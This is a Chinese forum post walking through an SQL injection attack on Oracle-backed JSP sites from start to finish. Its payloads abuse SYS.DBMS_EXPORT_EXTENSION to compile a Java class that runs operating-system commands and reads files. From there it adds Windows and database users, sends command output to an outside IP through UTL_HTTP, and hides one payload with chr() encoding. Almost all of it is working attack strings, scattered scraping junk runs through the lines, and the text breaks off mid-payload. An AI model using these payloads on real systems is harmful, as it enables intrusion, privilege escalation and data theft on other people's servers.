
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 * W3 i" L4 v2 ]0 H6 F% t
" x& r/ b' {' f7 b# t+ a; N
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
5 z9 f6 S2 \0 Q3 m的形式即可。(用" 'a'|| "是为了让语句返回true值)
  }& ~+ j/ g1 U语句有点长,可能要用post提交。 8 q; ]# S) [' y$ _6 J
以下是各个步骤:
" Z8 V  G- y7 A4 f. C" @1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||( ( k1 r3 }; N' K; S- W& F: O  ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ B1 y& J6 b7 u  k2 P9 k. k% Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ V- Y  T; [7 ?8 s6 O
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
0 H% Q9 |! n, u; l  |}'''';END;'';END;--','SYS',0,'1',0) from dual
0 n2 Q, e# C7 y: {" e3 H2 u)
, c' l+ T, G  s------------------------ 6 s8 s' i5 {; q: O) N* E/ l* _
如果url有长度限制,可以把readFile()函数块去掉,即:
3 p( R" ?6 C6 Q0 J0 L/xxx.jsp?id=1 and '1'<>'a'||(
, C. m$ G* Y* cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Z6 ]5 a7 d  _9 B" q7 |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 h( N0 m6 _# x% `new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& D, t# W4 h2 L9 T5 S+ |. c; @% G2 E}'''';END;'';END;--','SYS',0,'1',0) from dual 5 F( U& y7 v- X- F; {3 y
)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
: R% u0 S5 p2 R0 l$ q7 Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual  ]3 a. `8 h  z! z
3.创建函数
! j  F$ L! ~# mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) D& ~, O8 N, i9 @create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual: G% _! G9 f% f  ]! ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, Q0 u4 ^- f( W# N: [/ }create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual) s) X$ @% f7 {  r6 F3 x( N9 y
4.赋public执行函数的权限
% B& J, E( Y) Z& \) H  C5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 c* a& M5 P  R- Y  `) f" ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
6 c$ F8 w8 M" L. \1 b' |8 K' U5 m$ wand '1'<>'11'||( ' B  v2 P; n4 i6 m, y
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
/ w+ n5 W( ^* N% p)
8 v6 P2 r9 d$ s+ F+ Jand '1'<>(
$ M! h; T. _/ Z" m. P$ Bselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
4 J/ G" G1 o$ ^$ e1 U)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
- \* p+ T2 F5 M4 q+ Yselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual # u8 ?' ~' t6 ?, ]5 r4 [. w
& Q5 S% x' B7 X& Y
) & Z8 I+ A+ }! f! T$ Q# |
/xxx.jsp?id=1 and '1'<>(
! m3 u! x8 L: v: vselect  sys.LinxReadFile('c:/boot.ini') from dual. [" O0 M6 E4 s) e4 a1 {
) _8 R$ I2 l* W* f
)
( E7 @1 p" _: a+ C7 ~  
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
" S1 I/ L* t0 |  K- [6 J6 N如果要查看运行结果可以用 union : , x* f$ D5 B: N
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request:
% ]" X2 ?: |7 V5 ]% y/ ]/xxx.jsp?id=1 and '1'<>(
/ |, y9 c1 a4 G0 ^8 `, o; ySELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual; L- q+ u( a+ t( h# I
)
- E4 B& ]4 P& |  e0 C/xxx.jsp?id=1 and '1'<>( 4 m4 I" k& E- Z0 x( M# E9 U
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
! x" v) a) Q" N% n) 7 l" g/ ?2 b" E+ X0 V9 N; t
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  J, \) v7 ?( l! U
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* U1 l8 b3 t1 |3 p" I9 B0 O# `
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
( |& c* u# k  G( d. J( _. g5 q7 j4 N124829445 2 [2 q$ R# Z& j) N" C, @6 X
2008.1.12 6 P8 j6 T) f7 x* q8 D0 {1 D4 x
linyujian@bjfu.edu.cn # V+ c3 B$ q. L# `8 p
====================================================================== * _4 n& @) @" g/ v5 Y  k
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 J* w) N8 G* ]% A4 V5 K1 ^CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
8 V+ W# i+ a0 @* I9 s% D9 qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
9 ]# d3 \, Q, W  A7 ]7 qchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual   ?! d, I$ {/ A$ W8 k& w: q
确定漏洞存在:
1<>(
+ v+ e% L  ^) s% o- o& B; Cselect user_id from all_users where username='LINXSQL' , L, J+ l5 ~% L" ?1 K: p3 y
)
给linxsql连接权限:
5 c. P) F* j6 ^7 d) A& A; Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 G" O' S$ Q( q- e4 o# N7 T' TGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
. x) H5 S7 C0 l  u0 G* Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 F2 e* }8 D$ @* v/ Fdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 8 A1 z. m  Y* m2 m1 v
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:* h& Z' O' z) }% E3 Z
1.jsp?id=1 and '1'<>( * t9 M" b  u* d8 _" L% @* u5 @  r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 Q3 O$ B: B1 x* U9 c
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
$ @  s1 _8 m* l3 P) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- f6 V) _/ J9 v4 D: r" @# \! I
 )8 d% H, |, Q* i
( a* l( `( v/ T$ j

7 F  w+ n0 |* q8 d/ @5 v- r9 c) z2 ~4 \2 x5 U6 W2 P$ ]) g